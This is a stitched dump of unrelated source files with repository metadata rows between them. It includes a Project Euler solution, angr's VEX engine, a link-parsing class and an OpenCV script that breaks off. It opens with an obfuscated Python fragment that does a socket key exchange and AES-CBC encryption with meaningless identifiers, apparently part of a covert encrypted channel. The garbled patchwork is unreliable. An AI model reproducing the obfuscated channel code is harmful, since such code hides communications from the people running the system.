sock.send(wWtKmzLluyGJQdDKJuhxDRVbBkKUuxrBjlkmMbEpRDNMHvFKVoClMZaiofwOBNMkliYNwCOoxwPDlEWsjfqccRzMMfLIzAZTKQCzzfwHiIvBDKnaeeNarleUiQRJVWjT(OyGHFspVyMJhhtkOZiMSiKLAWfYOGjjYhfZcREsgEGCoRhdNwyiIJIJOfjMeoZkFJiPitnmTwMvsUCZpHLZJsfLLpbSfDYZMjqhdxyGSQxiEmSYomHyepLDoxakqrYMJ))
IrRkNnGENquaebwxcAEgPJOtGSRWDXOyNtPviVrZfYoUyliLUSJNvZYtfePSlkCerIjHVxijrFHFtUWjDrhzDtraytOJIbVsXBCjrEWSLkcezCmsFlsUQflodwclSGUM = OoUSTzYrmbsTlbduPEWrYyVFuKVoKRljNvnbOjqTIgSdocbQScmInoalUrDdCGzSAUtEMlyUiiPDIfUrDGHpipJHNDMIZMJxZrDHNobyrEMDhdSfWLrpnTiVLoRYJsvh(sock.recv(4096))
else:
IrRkNnGENquaebwxcAEgPJOtGSRWDXOyNtPviVrZfYoUyliLUSJNvZYtfePSlkCerIjHVxijrFHFtUWjDrhzDtraytOJIbVsXBCjrEWSLkcezCmsFlsUQflodwclSGUM = OoUSTzYrmbsTlbduPEWrYyVFuKVoKRljNvnbOjqTIgSdocbQScmInoalUrDdCGzSAUtEMlyUiiPDIfUrDGHpipJHNDMIZMJxZrDHNobyrEMDhdSfWLrpnTiVLoRYJsvh(sock.recv(4096))
sock.send(wWtKmzLluyGJQdDKJuhxDRVbBkKUuxrBjlkmMbEpRDNMHvFKVoClMZaiofwOBNMkliYNwCOoxwPDlEWsjfqccRzMMfLIzAZTKQCzzfwHiIvBDKnaeeNarleUiQRJVWjT(OyGHFspVyMJhhtkOZiMSiKLAWfYOGjjYhfZcREsgEGCoRhdNwyiIJIJOfjMeoZkFJiPitnmTwMvsUCZpHLZJsfLLpbSfDYZMjqhdxyGSQxiEmSYomHyepLDoxakqrYMJ))
IMDyoarXIvJTJdWJCGOFHRGoYpyZOQwMQswXgCqqBYZPwHmEKWHFgWvSTOWflvFAvItvdYVDBYxOTEcVQJMpmSLVlLEeHFdwjSDhVtFcIpGmGyKHqEoogvSnIVeJcmTb = pow(IrRkNnGENquaebwxcAEgPJOtGSRWDXOyNtPviVrZfYoUyliLUSJNvZYtfePSlkCerIjHVxijrFHFtUWjDrhzDtraytOJIbVsXBCjrEWSLkcezCmsFlsUQflodwclSGUM, dcqwDxyKfGLRYrNbxalVWtalhDWTwnDqMFBzeKinEPrZcdVKuOrVKkjbwkIOakfseiRmhoRcAgajomIRatVETfRLikeKBOhnFcJZjzOwdPIeOpBkSDsGsSTcxjoFbJGf, gHhWmUaToMTVPuLkTzZBiWKYnZGdFshkAhhQbzeEpsgVCtnEyCBfxWNXBdDfDOlIqpoXJLfxkNQQxgWrtWOWXkyBrgRMBnkQXARhtzeDlSEgXWnreULTtzLOeDjCARZA)
return SHA256.new(wWtKmzLluyGJQdDKJuhxDRVbBkKUuxrBjlkmMbEpRDNMHvFKVoClMZaiofwOBNMkliYNwCOoxwPDlEWsjfqccRzMMfLIzAZTKQCzzfwHiIvBDKnaeeNarleUiQRJVWjT(IMDyoarXIvJTJdWJCGOFHRGoYpyZOQwMQswXgCqqBYZPwHmEKWHFgWvSTOWflvFAvItvdYVDBYxOTEcVQJMpmSLVlLEeHFdwjSDhVtFcIpGmGyKHqEoogvSnIVeJcmTb)).digest()
def AHnNuwPNvaLtDXnDNSbnjztjWOKZyrgTQLxVasvZVdPxLoZNXnfWxgdBmcQkhkqdZRbupkhHvBxyffIgbSWYcvxiqXaHHnuOdzVmbMZYzZzwIBsGoHTsdVQjxxUrxChY(bgdLsmrPZGElnfPEgYqlCDvjCwbQrbYAxuEitvUuoDsWynocpzQdgPEIYkItfVxDonOafKMdFRvPesnIRQfrKTJiLlReHBJtsOCCJnZUCltCOUhGNZWxEpUgzPteEztr, KEY):
bgdLsmrPZGElnfPEgYqlCDvjCwbQrbYAxuEitvUuoDsWynocpzQdgPEIYkItfVxDonOafKMdFRvPesnIRQfrKTJiLlReHBJtsOCCJnZUCltCOUhGNZWxEpUgzPteEztr = gEldrYdtgILwZMCzKXnshgTsysMFuzlcoMlTWRtHgLCOdhqCcafsfUfdWehMrjGrSRhOpKCFlZtiNjeDCGmCPEFNvRgmNhCiFxRbmSUUIhZIUqjSGhdJaRxYFIECjOcH(bgdLsmrPZGElnfPEgYqlCDvjCwbQrbYAxuEitvUuoDsWynocpzQdgPEIYkItfVxDonOafKMdFRvPesnIRQfrKTJiLlReHBJtsOCCJnZUCltCOUhGNZWxEpUgzPteEztr)
kFDMmqsVkPXClQsgNBDAMGyydNsTUCHCcIhLRFmHJNWSacEaQjQPlMUJaIlNlXcBFprHlowDNbxycEoZzaiBTOJIXxMxmSUEjPeRyJqYfpAiPGKuzjGQUbCffGOhAfLF = Random.new().read(AES.block_size)
twZydEKxUQvQzsikGhVTyDbBhIGctQopEZqEdTRUxqVcZrxgRlZqZcbjTVSRRqodFKmDwsWcTytexLOewBTShWNBpmSMoZmRWriYPhhfuRLxXjzpXFpmqrbktpNJCWlo = AES.new(KEY, AES.MODE_CBC, kFDMmqsVkPXClQsgNBDAMGyydNsTUCHCcIhLRFmHJNWSacEaQjQPlMUJaIlNlXcBFprHlowDNbxycEoZzaiBTOJIXxMxmSUEjPeRyJqYfpAiPGKuzjGQUbCffGOhAfLF)
return kFDMmqsVkPXClQsgNBDAMGyydNsTUCHCcIhLRFmHJNWSacEaQjQPlMUJaIlNlXcBFprHlowDNbxycEoZzaiBTOJIXxMxmSUEjPeRyJqYfpAiPGKuzjGQUbCffGOhAfLF + twZydEKxUQvQzsikGhVTyDbBhIGctQopEZqEdTRUxqVcZrxgRlZqZcbjTVSRRqodFKmDwsWcTytexLOewBTShWNBpmSMoZmRWriYPhhfuRLxXjzpXFpmqrbktpNJCWlo.encrypt(bgdLsmrPZGElnfPEgYqlCDvjCwbQrbYAxuEitvUuoDsWynocpzQdgPEIYkItfVxDonOafKMdFRvPesnIRQfrKTJiLlReHBJtsOCCJnZUCltCOUhGNZWxEpUgzPteEztr)
def eAWDPoJlBkIQLeOybYBQJTCJhVbTyejYBOUUrlAZoOKfFnmRZhgAYGzZdgNhHkmNAJuDsYgmtGjkyYmrBpMzzdLAiHUMIKtnMGiqObhoTidXoErVIkWHhYAckpMknpws(ciphertext, KEY):
kFDMmqsVkPXClQsgNBDAMGyydNsTUCHCcIhLRFmHJNWSacEaQjQPlMUJaIlNlXcBFprHlowDNbxycEoZzaiBTOJIXxMxmSUEjPeRyJqYfpAiPGKuzjGQUbCffGOhAfLF = ciphertext[:AES.block_size]
twZydEKxUQvQzsikGhVTyDbBhIGctQopEZqEdTRUxqVcZrxgRlZqZcbjTVSRRqodFKmDwsWcTytexLOewBTShWNBpmSMoZmRWriYPhhfuRLxXjzpXFpmqrbktpNJCWlo = AES.new(KEY, AES.MODE_CBC, kFDMmqsVkPXClQsgNBDAMGyydNsTUCHCcIhLRFmHJNWSacEaQjQPlMUJaIlNlXcBFprHlowDNbxycEoZzaiBTOJIXxMxmSUEjPeRyJqYfpAiPGKuzjGQUbCffGOhAfLF)
bgdLsmrPZGElnfPEgYqlCDvjCwbQrbYAxuEitvUuoDsWynocpzQdgPEIYkItfVxDonOafKMdFRvPesnIRQfrKTJiLlReHBJtsOCCJnZUCltCOUhGNZWxEpUgzPteEztr = twZydEKxUQvQzsikGhVTyDbBhIGctQopEZqEdTRUxqVcZrxgRlZqZcbjTVSRRqodFKmDwsWcTytexLOewBTShWNBpmSMoZmRWriYPhhfuRLxXjzpXFpmqrbktpNJCWlo.decrypt(ciphertext[AES.block_size:])
return QjHzhUCTrwVefddXugONOhThvXziTmlfyjZrYxyadqwmwAuyxIlIWyNbHcUpjUaeHVChIDTpNzDYHXHyXYhzjzdjSgttsMmVzcnfqObmLfjpiVrDNUCtuKhPvaThRSLT(bgdLsmrPZGElnfPEgYqlCDvjCwbQrbYAxuEitvUuoDsWynocpzQdgPEIYkItfVxDonOafKMdFRvPesnIRQfrKTJiLlReHBJtsOCCJnZUCltCOUhGNZWxEpUgzPteEztr)
| [
"[email protected]"
] | |
eb505b88bac2629ad98d57305ff289ab7e507c38 | 94d1e805521575afb7b6256af1dd6de65a50ada9 | /problem_5/problem_5.py | 458d419fed34ea5f74c68c10e9d6c3fe6dc7dbf6 | [] | no_license | John-W-Stevens/Euler100 | fe2004786f64172e02ba18fbe33d95ceb68abf59 | 6f193a47e9e019b99ee9b188d2227587f5a3f4b3 | refs/heads/master | 2022-11-26T07:23:36.505138 | 2020-07-28T17:36:39 | 2020-07-28T17:36:39 | 274,224,709 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,828 | py | # 2520 is the smallest number that can be divided by each of the numbers from 1 to 10 without any remainder.
# What is the smallest positive number that is evenly divisible by all of the numbers from 1 to 20?
import time
def is_prime(n):
""" Returns Boolean """
if n <= 1: return False
if n == 2 or n == 3: return True
if n % 2 == 0 or n % 3 == 0: return False
i, w, = 5, 2
while i * i <= n:
if n % i == 0:
return False
i += w
w = 6 - w
return True
def prime_factorization(n):
"""
Assumes n >= 2
Returns a dict mapping the prime factors of n and their respective powers
"""
if is_prime(n):
return {n: 1}
prime_factors = {2:0, 3:0,}
while n % 2 == 0:
prime_factors[2] += 1
n /= 2
while n % 3 == 0:
prime_factors[3] += 1
n /= 3
for i in range(5, int(n**0.5)+1, 2):
if not is_prime(i):
continue
while n % i == 0:
try:
prime_factors[i] += 1
except KeyError:
prime_factors[i] = 1
n /= i
return prime_factors
def problem_5(n):
""" Returns the smallest number divisible by every number <= n """
output = 1
prime_factor_map = {}
for i in range(2, n+1):
prime_factors = prime_factorization(i)
for p,e in prime_factors.items():
try:
if prime_factor_map[p] < e:
prime_factor_map[p] = e
except KeyError:
prime_factor_map[p] = e
for p,e in prime_factor_map.items():
output *= pow(p,e)
return output
start = time.time()
solution = problem_5(20)
print(f"{solution} found in {time.time() - start} seconds.")
# 232792560 found in 3.1948089599609375e-05 seconds.
| [
"[email protected]"
] | |
050f658bbc509a570071f2ce3a366845a2d65a4a | 33af6185b48bd76f97f0a74390a3a812ee216c78 | /angr/angr/engines/vex/engine.py | 99886567ccb324c7a43534a230d455d3977bf526 | [
"BSD-2-Clause"
] | permissive | Ruide/angr-dev | dab0cabd907fce47ac698f890c3f3a8b80ab7e2a | 964dc80c758e25c698c2cbcc454ef5954c5fa0a0 | refs/heads/master | 2022-11-10T11:27:13.355024 | 2017-10-07T14:29:09 | 2017-10-07T14:29:09 | 104,417,044 | 0 | 1 | BSD-2-Clause | 2022-10-16T04:48:10 | 2017-09-22T01:35:12 | C | UTF-8 | Python | false | false | 24,603 | py | import sys
from cachetools import LRUCache
import pyvex
import claripy
from archinfo import ArchARM
from ... import sim_options as o
from ...state_plugins.inspect import BP_AFTER, BP_BEFORE
from ...state_plugins.sim_action import SimActionExit, SimActionObject
from ...errors import (SimError, SimIRSBError, SimSolverError, SimMemoryAddressError, SimReliftException,
UnsupportedDirtyError, SimTranslationError, SimEngineError, SimSegfaultError,
SimMemoryError)
from ..engine import SimEngine
from .statements import translate_stmt
from .expressions import translate_expr
import logging
l = logging.getLogger("angr.engines.vex.engine")
#pylint: disable=arguments-differ
VEX_IRSB_MAX_SIZE = 400
VEX_IRSB_MAX_INST = 99
class SimEngineVEX(SimEngine):
"""
Execution engine based on VEX, Valgrind's IR.
"""
def __init__(self, stop_points=None,
use_cache=True,
cache_size=10000,
default_opt_level=1,
support_selfmodifying_code=False,
single_step=False):
super(SimEngineVEX, self).__init__()
self._stop_points = stop_points
self._use_cache = use_cache
self._default_opt_level = default_opt_level
self._support_selfmodifying_code = support_selfmodifying_code
self._single_step = single_step
self._cache_size = cache_size
self._block_cache = None
self._cache_hit_count = 0
self._cache_miss_count = 0
self._initialize_block_cache()
def _initialize_block_cache(self):
self._block_cache = LRUCache(maxsize=self._cache_size)
self._cache_hit_count = 0
self._cache_miss_count = 0
def process(self, state,
irsb=None,
skip_stmts=0,
last_stmt=99999999,
whitelist=None,
inline=False,
force_addr=None,
insn_bytes=None,
size=None,
num_inst=None,
traceflags=0,
thumb=False,
opt_level=None,
**kwargs):
"""
:param state: The state with which to execute
:param irsb: The PyVEX IRSB object to use for execution. If not provided one will be lifted.
:param skip_stmts: The number of statements to skip in processing
:param last_stmt: Do not execute any statements after this statement
:param whitelist: Only execute statements in this set
:param inline: This is an inline execution. Do not bother copying the state.
:param force_addr: Force execution to pretend that we're working at this concrete address
:param thumb: Whether the block should be lifted in ARM's THUMB mode.
:param opt_level: The VEX optimization level to use.
:param insn_bytes: A string of bytes to use for the block instead of the project.
:param size: The maximum size of the block, in bytes.
:param num_inst: The maximum number of instructions.
:param traceflags: traceflags to be passed to VEX. (default: 0)
:returns: A SimSuccessors object categorizing the block's successors
"""
return super(SimEngineVEX, self).process(state, irsb,
skip_stmts=skip_stmts,
last_stmt=last_stmt,
whitelist=whitelist,
inline=inline,
force_addr=force_addr,
insn_bytes=insn_bytes,
size=size,
num_inst=num_inst,
traceflags=traceflags,
thumb=thumb,
opt_level=opt_level)
def _check(self, state, *args, **kwargs):
return True
def _process(self, state, successors, irsb=None, skip_stmts=0, last_stmt=99999999, whitelist=None, insn_bytes=None, size=None, num_inst=None, traceflags=0, thumb=False, opt_level=None):
successors.sort = 'IRSB'
successors.description = 'IRSB'
state.history.recent_block_count = 1
state.scratch.guard = claripy.true
state.scratch.sim_procedure = None
addr = successors.addr
state._inspect('irsb', BP_BEFORE, address=addr)
while True:
if irsb is None:
irsb = self.lift(
addr=addr,
state=state,
insn_bytes=insn_bytes,
size=size,
num_inst=num_inst,
traceflags=traceflags,
thumb=thumb,
opt_level=opt_level)
if irsb.size == 0:
raise SimIRSBError("Empty IRSB passed to SimIRSB.")
# check permissions, are we allowed to execute here? Do we care?
if o.STRICT_PAGE_ACCESS in state.options:
try:
perms = state.memory.permissions(addr)
except (KeyError, SimMemoryError): # TODO: can this still raise KeyError?
raise SimSegfaultError(addr, 'exec-miss')
else:
if not perms.symbolic:
perms = state.se.eval(perms)
if not perms & 4 and o.ENABLE_NX in state.options:
raise SimSegfaultError(addr, 'non-executable')
state.scratch.tyenv = irsb.tyenv
state.scratch.irsb = irsb
try:
self._handle_irsb(state, successors, irsb, skip_stmts, last_stmt, whitelist)
except SimReliftException as e:
state = e.state
if insn_bytes is not None:
raise SimEngineError("You cannot pass self-modifying code as insn_bytes!!!")
new_ip = state.scratch.ins_addr
if size is not None:
size -= new_ip - addr
if num_inst is not None:
num_inst -= state.scratch.num_insns
addr = new_ip
# clear the stage before creating the new IRSB
state.scratch.dirty_addrs.clear()
irsb = None
except SimError as ex:
ex.record_state(state)
raise
else:
break
state._inspect('irsb', BP_AFTER)
successors.processed = True
def _handle_irsb(self, state, successors, irsb, skip_stmts, last_stmt, whitelist):
# shortcut. we'll be typing this a lot
ss = irsb.statements
num_stmts = len(ss)
# fill in artifacts
successors.artifacts['irsb'] = irsb
successors.artifacts['irsb_size'] = irsb.size
successors.artifacts['irsb_direct_next'] = irsb.direct_next
successors.artifacts['irsb_default_jumpkind'] = irsb.jumpkind
insn_addrs = [ ]
# if we've told the block to truncate before it ends, it will definitely have a default
# exit barring errors
has_default_exit = num_stmts <= last_stmt
# This option makes us only execute the last four instructions
if o.SUPER_FASTPATH in state.options:
imark_counter = 0
for i in xrange(len(ss) - 1, -1, -1):
if type(ss[i]) is pyvex.IRStmt.IMark:
imark_counter += 1
if imark_counter >= 4:
skip_stmts = max(skip_stmts, i)
break
for stmt_idx, stmt in enumerate(ss):
if isinstance(stmt, pyvex.IRStmt.IMark):
insn_addrs.append(stmt.addr + stmt.delta)
if stmt_idx < skip_stmts:
l.debug("Skipping statement %d", stmt_idx)
continue
if last_stmt is not None and stmt_idx > last_stmt:
l.debug("Truncating statement %d", stmt_idx)
continue
if whitelist is not None and stmt_idx not in whitelist:
l.debug("Blacklisting statement %d", stmt_idx)
continue
try:
state.scratch.stmt_idx = stmt_idx
state._inspect('statement', BP_BEFORE, statement=stmt_idx)
self._handle_statement(state, successors, stmt)
state._inspect('statement', BP_AFTER)
except UnsupportedDirtyError:
if o.BYPASS_UNSUPPORTED_IRDIRTY not in state.options:
raise
if stmt.tmp not in (0xffffffff, -1):
retval_size = state.scratch.tyenv.sizeof(stmt.tmp)
retval = state.se.Unconstrained("unsupported_dirty_%s" % stmt.cee.name, retval_size)
state.scratch.store_tmp(stmt.tmp, retval, None, None)
state.history.add_event('resilience', resilience_type='dirty', dirty=stmt.cee.name,
message='unsupported Dirty call')
except (SimSolverError, SimMemoryAddressError):
l.warning("%#x hit an error while analyzing statement %d", successors.addr, stmt_idx, exc_info=True)
has_default_exit = False
break
state.scratch.stmt_idx = num_stmts
successors.artifacts['insn_addrs'] = insn_addrs
# If there was an error, and not all the statements were processed,
# then this block does not have a default exit. This can happen if
# the block has an unavoidable "conditional" exit or if there's a legitimate
# error in the simulation
if has_default_exit:
l.debug("%s adding default exit.", self)
try:
next_expr = translate_expr(irsb.next, state)
state.history.extend_actions(next_expr.actions)
if o.TRACK_JMP_ACTIONS in state.options:
target_ao = SimActionObject(
next_expr.expr,
reg_deps=next_expr.reg_deps(), tmp_deps=next_expr.tmp_deps()
)
state.history.add_action(SimActionExit(state, target_ao, exit_type=SimActionExit.DEFAULT))
successors.add_successor(state, next_expr.expr, state.scratch.guard, irsb.jumpkind,
exit_stmt_idx='default', exit_ins_addr=state.scratch.ins_addr)
except KeyError:
# For some reason, the temporary variable that the successor relies on does not exist.
# It can be intentional (e.g. when executing a program slice)
# We save the current state anyways
successors.unsat_successors.append(state)
l.debug("The temporary variable for default exit of %s is missing.", self)
else:
l.debug("%s has no default exit", self)
# do return emulation and calless stuff
for exit_state in list(successors.all_successors):
exit_jumpkind = exit_state.history.jumpkind
if exit_jumpkind is None: exit_jumpkind = ""
if o.CALLLESS in state.options and exit_jumpkind == "Ijk_Call":
exit_state.registers.store(
exit_state.arch.ret_offset,
exit_state.se.Unconstrained('fake_ret_value', exit_state.arch.bits)
)
exit_state.scratch.target = exit_state.se.BVV(
successors.addr + irsb.size, exit_state.arch.bits
)
exit_state.history.jumpkind = "Ijk_Ret"
exit_state.regs.ip = exit_state.scratch.target
elif o.DO_RET_EMULATION in exit_state.options and \
(exit_jumpkind == "Ijk_Call" or exit_jumpkind.startswith('Ijk_Sys')):
l.debug("%s adding postcall exit.", self)
ret_state = exit_state.copy()
guard = ret_state.se.true if o.TRUE_RET_EMULATION_GUARD in state.options else ret_state.se.false
target = ret_state.se.BVV(successors.addr + irsb.size, ret_state.arch.bits)
if ret_state.arch.call_pushes_ret and not exit_jumpkind.startswith('Ijk_Sys'):
ret_state.regs.sp = ret_state.regs.sp + ret_state.arch.bytes
successors.add_successor(
ret_state, target, guard, 'Ijk_FakeRet', exit_stmt_idx='default',
exit_ins_addr=state.scratch.ins_addr
)
if whitelist and successors.is_empty:
# If statements of this block are white-listed and none of the exit statement (not even the default exit) is
# in the white-list, successors will be empty, and there is no way for us to get the final state.
# To this end, a final state is manually created
l.debug('Add an incomplete successor state as the result of an incomplete execution due to the white-list.')
successors.flat_successors.append(state)
def _handle_statement(self, state, successors, stmt):
"""
This function receives an initial state and imark and processes a list of pyvex.IRStmts
It annotates the request with a final state, last imark, and a list of SimIRStmts
"""
if type(stmt) == pyvex.IRStmt.IMark:
ins_addr = stmt.addr + stmt.delta
state.scratch.ins_addr = ins_addr
# Raise an exception if we're suddenly in self-modifying code
for subaddr in xrange(stmt.len):
if subaddr + stmt.addr in state.scratch.dirty_addrs:
raise SimReliftException(state)
state._inspect('instruction', BP_AFTER)
l.debug("IMark: %#x", stmt.addr)
state.scratch.num_insns += 1
state._inspect('instruction', BP_BEFORE, instruction=ins_addr)
# process it!
s_stmt = translate_stmt(stmt, state)
if s_stmt is not None:
state.history.extend_actions(s_stmt.actions)
# for the exits, put *not* taking the exit on the list of constraints so
# that we can continue on. Otherwise, add the constraints
if type(stmt) == pyvex.IRStmt.Exit:
l.debug("%s adding conditional exit", self)
# Produce our successor state!
# Let SimSuccessors.add_successor handle the nitty gritty details
exit_state = state.copy()
successors.add_successor(exit_state, s_stmt.target, s_stmt.guard, s_stmt.jumpkind,
exit_stmt_idx=state.scratch.stmt_idx, exit_ins_addr=state.scratch.ins_addr)
# Do our bookkeeping on the continuing state
cont_condition = claripy.Not(s_stmt.guard)
state.add_constraints(cont_condition)
state.scratch.guard = claripy.And(state.scratch.guard, cont_condition)
def lift(self,
state=None,
clemory=None,
insn_bytes=None,
arch=None,
addr=None,
size=None,
num_inst=None,
traceflags=0,
thumb=False,
opt_level=None):
"""
Lift an IRSB.
There are many possible valid sets of parameters. You at the very least must pass some
source of data, some source of an architecture, and some source of an address.
Sources of data in order of priority: insn_bytes, clemory, state
Sources of an address, in order of priority: addr, state
Sources of an architecture, in order of priority: arch, clemory, state
:param state: A state to use as a data source.
:param clemory: A cle.memory.Clemory object to use as a data source.
:param addr: The address at which to start the block.
:param thumb: Whether the block should be lifted in ARM's THUMB mode.
:param opt_level: The VEX optimization level to use. The final IR optimization level is determined by
(ordered by priority):
- Argument opt_level
- opt_level is set to 1 if OPTIMIZE_IR exists in state options
- self._default_opt_level
:param insn_bytes: A string of bytes to use as a data source.
:param size: The maximum size of the block, in bytes.
:param num_inst: The maximum number of instructions.
:param traceflags: traceflags to be passed to VEX. (default: 0)
"""
# phase 0: sanity check
if not state and not clemory and not insn_bytes:
raise ValueError("Must provide state or clemory or insn_bytes!")
if not state and not clemory and not arch:
raise ValueError("Must provide state or clemory or arch!")
if addr is None and not state:
raise ValueError("Must provide state or addr!")
if arch is None:
arch = clemory._arch if clemory else state.arch
if arch.name.startswith("MIPS") and self._single_step:
l.error("Cannot specify single-stepping on MIPS.")
self._single_step = False
# phase 1: parameter defaults
if addr is None:
addr = state.se.eval(state._ip)
if size is not None:
size = min(size, VEX_IRSB_MAX_SIZE)
if size is None:
size = VEX_IRSB_MAX_SIZE
if num_inst is not None:
num_inst = min(num_inst, VEX_IRSB_MAX_INST)
if num_inst is None and self._single_step:
num_inst = 1
if opt_level is None:
if state and o.OPTIMIZE_IR in state.options:
opt_level = 1
else:
opt_level = self._default_opt_level
if self._support_selfmodifying_code:
if opt_level > 0:
l.warning("Self-modifying code is not always correctly optimized by PyVEX. To guarantee correctness, VEX optimizations have been disabled.")
opt_level = 0
if state and o.OPTIMIZE_IR in state.options:
state.options.remove(o.OPTIMIZE_IR)
# phase 2: thumb normalization
thumb = int(thumb)
if isinstance(arch, ArchARM):
if addr % 2 == 1:
thumb = 1
if thumb:
addr &= ~1
elif thumb:
l.error("thumb=True passed on non-arm architecture!")
thumb = 0
# phase 3: check cache
cache_key = (addr, insn_bytes, size, num_inst, thumb, opt_level)
if self._use_cache and cache_key in self._block_cache:
self._cache_hit_count += 1
irsb = self._block_cache[cache_key]
stop_point = self._first_stoppoint(irsb)
if stop_point is None:
return irsb
else:
size = stop_point - addr
# check the cache again
cache_key = (addr, insn_bytes, size, num_inst, thumb, opt_level)
if cache_key in self._block_cache:
self._cache_hit_count += 1
return self._block_cache[cache_key]
else:
self._cache_miss_count += 1
else:
self._cache_miss_count += 1
# phase 4: get bytes
if insn_bytes is not None:
buff, size = insn_bytes, len(insn_bytes)
else:
buff, size = self._load_bytes(addr, size, state, clemory)
if not buff or size == 0:
raise SimEngineError("No bytes in memory for block starting at %#x." % addr)
# phase 5: call into pyvex
l.debug("Creating pyvex.IRSB of arch %s at %#x", arch.name, addr)
try:
for subphase in xrange(2):
irsb = pyvex.IRSB(buff, addr + thumb, arch,
num_bytes=size,
num_inst=num_inst,
bytes_offset=thumb,
traceflags=traceflags,
opt_level=opt_level)
if subphase == 0:
# check for possible stop points
stop_point = self._first_stoppoint(irsb)
if stop_point is not None:
size = stop_point - addr
continue
if self._use_cache:
self._block_cache[cache_key] = irsb
return irsb
# phase x: error handling
except pyvex.PyVEXError:
l.debug("VEX translation error at %#x", addr)
if isinstance(buff, str):
l.debug('Using bytes: ' + buff)
else:
l.debug("Using bytes: " + str(pyvex.ffi.buffer(buff, size)).encode('hex'))
e_type, value, traceback = sys.exc_info()
raise SimTranslationError, ("Translation error", e_type, value), traceback
def _load_bytes(self, addr, max_size, state=None, clemory=None):
if not clemory:
if state is None:
raise SimEngineError('state and clemory cannot both be None in _load_bytes().')
if o.ABSTRACT_MEMORY in state.options:
# abstract memory
clemory = state.memory.regions['global'].memory.mem._memory_backer
else:
# symbolic memory
clemory = state.memory.mem._memory_backer
buff, size = "", 0
# Load from the clemory if we can
smc = self._support_selfmodifying_code
if state:
try:
p = state.memory.permissions(addr)
if p.symbolic:
smc = True
else:
smc = claripy.is_true(p & 2 != 0)
except: # pylint: disable=bare-except
smc = True # I don't know why this would ever happen, we checked this right?
if not smc or not state:
try:
buff, size = clemory.read_bytes_c(addr)
except KeyError:
pass
# If that didn't work, try to load from the state
if size == 0 and state:
if addr in state.memory and addr + max_size - 1 in state.memory:
buff = state.se.eval(state.memory.load(addr, max_size, inspect=False), cast_to=str)
size = max_size
else:
good_addrs = []
for i in xrange(max_size):
if addr + i in state.memory:
good_addrs.append(addr + i)
else:
break
buff = ''.join(chr(state.se.eval(state.memory.load(i, 1, inspect=False))) for i in good_addrs)
size = len(buff)
size = min(max_size, size)
return buff, size
def _first_stoppoint(self, irsb):
"""
Enumerate the imarks in the block. If any of them (after the first one) are at a stop point, returns the address
of the stop point. None is returned otherwise.
"""
if self._stop_points is None:
return None
first_imark = True
for stmt in irsb.statements:
if isinstance(stmt, pyvex.stmt.IMark):
addr = stmt.addr + stmt.delta
if not first_imark and addr in self._stop_points:
# could this part be moved by pyvex?
return addr
first_imark = False
return None
def clear_cache(self):
self._block_cache = LRUCache(maxsize=self._cache_size)
self._cache_hit_count = 0
self._cache_miss_count = 0
#
# Pickling
#
def __setstate__(self, state):
super(SimEngineVEX, self).__setstate__(state)
self._stop_points = state['_stop_points']
self._use_cache = state['_use_cache']
self._default_opt_level = state['_default_opt_level']
self._support_selfmodifying_code = state['_support_selfmodifying_code']
self._single_step = state['_single_step']
self._cache_size = state['_cache_size']
# rebuild block cache
self._initialize_block_cache()
def __getstate__(self):
s = super(SimEngineVEX, self).__getstate__()
s['_stop_points'] = self._stop_points
s['_use_cache'] = self._use_cache
s['_default_opt_level'] = self._default_opt_level
s['_support_selfmodifying_code'] = self._support_selfmodifying_code
s['_single_step'] = self._single_step
s['_cache_size'] = self._cache_size
return s
| [
"[email protected]"
] | |
f6626102fabf2650c694713c2ad5149437e06451 | 0dec4bee4820161ae892f615023dd6ff9dae8ff4 | /PyMrawler/SocialEventCrawlerGR/Links.py | 40ddb5a031bebced3cf662f7c038a859ef7f5f1d | [] | no_license | mpetyx/PyMrawler | 8fbf77276838f3e26b746205f5ded33e9c5be559 | 6f7dc608620ddfff1c3021aa740cf8409a7eb311 | refs/heads/master | 2016-09-10T00:16:49.353207 | 2012-10-17T10:13:15 | 2012-10-17T10:13:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,323 | py | '''
Created on 11 Dec 2011
@author: mpetyx
'''
class Link:
def __init__(self,text):
"""
Here we search all the links included in the description
"""
self.links = None
from TextHandling import TextFunctions
self.text = TextFunctions(text)
self.lines = self.text.lines
self.words = []
def links(self):
import re
# parsing addresses
# http://stackoverflow.com/questions/6173/regular-expression-for-parsing-links-from-a-webpage
self.links = re.findall(r'\b(https?|ftp|file)://[-A-Z0-9+&@#/%?=~_|!:,.;]*[-A-Z0-9+&@#/%=~_|]',self.text)
def youtube(self):
self.youtubeLinks = []
for link in self.links:
if "youtube" in link:
self.youtubeLinks.append(link)
return self.youtubeLinks
def parse_url(self):
e=r'/((http|ftp):\/)?\/?([^:\/\s]+)((\/\w+)*\/)([\w\-\.]+\.[^#?\s]+)(#[\w\-]+)?/'
e2=r'/^((http|ftp):\/)?\/?([^:\/\s]+)((\/\w+)*\/)([\w\-\.]+\.[^#?\s]+)(#[\w\-]+)?$/'
def simple_parse(self):
for line in self.lines:
if "www" in line:
print line
| [
"[email protected]"
] | |
34356c92a49affa75602a75e6add206fdd9417a7 | 012837eafe45c8f7ee5fc77d4c4d7725d5314c5c | /workshops/8-day/8-clazz.py | 6322475cba90b04e02f631dcfd665c48f6e3d371 | [
"MIT"
] | permissive | ai-erorr404/opencv-practice | e9408cf006779a678cf3a30fc60e9dbeb3c8e493 | 60ef5e4aec61ee5f7e675fb919e8f612e59f664a | refs/heads/master | 2021-02-08T11:17:04.763522 | 2020-02-22T09:43:04 | 2020-02-22T09:43:04 | 244,146,060 | 1 | 1 | MIT | 2020-03-01T12:35:02 | 2020-03-01T12:35:01 | null | UTF-8 | Python | false | false | 1,854 | py | #!/usr/bin/env python3
# -*- coding=utf-8 -*-
import cv2 as cv
"""
视频前景/背景提取
视频前景/背景提取技术用于提取前景移动对象,通过获取移动对象的mask实现获取移动物体的轮廓信息,最常用的方法是帧差相减法进行,即用
前一帧的图像最为背景图像与当前帧进行相减,该方法对光照、噪声相当敏感。opencv中对背景模型提取的算法有两种,一种是基于高斯模糊模型(GMM)
实现背景提取,另外一种是使用最近相邻模型(KNN)实现的,api如下:
GMM cv.createBackgroundSubtractorMOG2(history, varThreshold, detectShadows)
- history: 过往帧数,默认500帧,历史进行比较
- varThreshold: 马氏距离,默认16,值越大,最新的像素会归为前景,值越小对光照敏感
- detectShadow: 是否保留阴影检测,默认True, 开启阴影检测虽然可以提高提取效果,但是效率会变低,推荐不开启
KNN cv.createBackgroundSubtractorKNN()的参数描述如上
"""
def main():
capture = cv.VideoCapture(0)
